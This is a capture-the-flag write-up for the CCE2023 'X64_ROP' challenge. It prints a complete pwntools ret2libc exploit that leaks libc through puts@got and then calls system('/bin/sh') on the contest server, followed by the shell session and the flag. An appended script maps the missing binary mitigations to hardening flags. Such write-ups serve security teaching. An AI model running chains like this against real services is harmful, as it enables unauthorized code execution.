IT/CTF / 2023. 6. 6. 11:17

CCE2023 APOLLO PWNABLE [100] - X64_ROP


Description

X64_ROP

nc prob2.cstec.kr 5339

 

for_user.zip (0.91MB)

 

A 64-bit ROP challenge. The binary has a stack buffer overflow, and PIE is disabled, so the gadget, PLT and GOT addresses are fixed.

 

Writing the exploit

#!/usr/bin/python3
from pwn import *

p = remote("prob2.cstec.kr", 5339)

e = ELF("./x64_rop")      # target binary (No PIE, so e.got/e.plt/e.sym are absolute)
l = ELF("./libc.so.6")    # libc shipped with the challenge, used for offsets

p.sendlineafter(b"Enter choice : ", b"1")

ret = 0x000000000040101a  # ret gadget
rdi = 0x0000000000401203  # pop rdi ; ret gadget

# Stage 1: overflow 16 bytes of buffer + 8 bytes of saved rbp, then
# call puts(puts@got) to leak the libc address of puts, and return to main
# so we get a second input.
buf = b""
buf += b'A' * 16
buf += b'B' * 8
buf += p64(rdi)
buf += p64(e.got["puts"])
buf += p64(e.plt["puts"])
buf += p64(e.sym["main"])

p.send(buf)

# puts prints the 6 significant bytes of the pointer; pad to 8 and unpack
leak = p.recv(6) + b"\x00\x00"
leak = u64(leak)
leak -= l.sym["puts"]     # libc base = leaked puts - offset of puts in libc

print(hex(leak))

system = leak + l.sym["system"]
binsh = leak + list(l.search(b"/bin/sh"))[0]

p.sendlineafter(b"Enter choice : ", b"1")

# Stage 2: same overflow, then system("/bin/sh"). The extra ret keeps rsp
# 16-byte aligned when system is entered (glibc uses movaps internally).
buf = b""
buf += b'A' * 16
buf += b'B' * 8
buf += p64(ret)
buf += p64(rdi)
buf += p64(binsh)
buf += p64(system)

p.send(buf)

p.interactive()
root@learner:/home/learner/Downloads/for_user# ./exploit64.py
[+] Opening connection to prob2.cstec.kr on port 5339: Done
[*] '/home/learner/Downloads/for_user/x64_rop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/home/learner/Downloads/for_user/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
0x7f488359f000
[*] Switching to interactive mode
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
apollob{c425dd1f1a818f4285f1a7179e42f1be277e1482abd80bcd8b9cd9d7e192d2fc2886f71185205befa3a3a5577938087fe7d91f507e5d3817c1fb4c673e1fcfac1e}
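The pwntools banner printed above is a compact summary of why this chain worked. As an added example (not part of the original writeup), the following script parses that banner, reports which mitigations were missing and what each absence meant for the exploit, and lists the gcc/ld flags that would close each gap. The banner text is copied from the run above; the function names are my own.

```python
import re

# Constructed sample input: the pwntools ELF banner for the challenge binary,
# copied from the run above (the x64_rop binary, not the libc).
SAMPLE_BANNER = """\
[*] '/home/learner/Downloads/for_user/x64_rop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
"""

def parse_checksec(text):
    """Turn the indented 'Key:   value' lines of a pwntools ELF banner into a dict."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s+(\w+):\s+(.+?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields

def missing_mitigations(fields):
    """List the hardening gaps and what each one meant for the chain above."""
    gaps = []
    if fields.get("Stack", "").startswith("No canary"):
        gaps.append("Stack: no canary, so the 24-byte overflow reaches the saved return address")
    if fields.get("PIE", "").startswith("No PIE"):
        gaps.append("PIE: disabled, so pop rdi/ret, puts@plt and puts@got sit at fixed addresses")
    if fields.get("RELRO", "") != "Full RELRO":
        gaps.append("RELRO: partial, so the GOT stays writable after startup (lazy binding)")
    if fields.get("NX", "") != "NX enabled":
        gaps.append("NX: disabled, so injected code on the stack would execute directly")
    return gaps

def recommended_flags(fields):
    """gcc/ld flags that close each reported gap (NX is already on for this binary)."""
    flags = []
    if fields.get("Stack", "").startswith("No canary"):
        flags.append("-fstack-protector-strong")
    if fields.get("PIE", "").startswith("No PIE"):
        flags += ["-fPIE", "-pie"]
    if fields.get("RELRO", "") != "Full RELRO":
        flags.append("-Wl,-z,relro,-z,now")
    if fields.get("NX", "") != "NX enabled":
        flags.append("-Wl,-z,noexecstack")
    return flags

if __name__ == "__main__":
    f = parse_checksec(SAMPLE_BANNER)
    print("\n".join(missing_mitigations(f)))
    print("rebuild with:", " ".join(recommended_flags(f)))
```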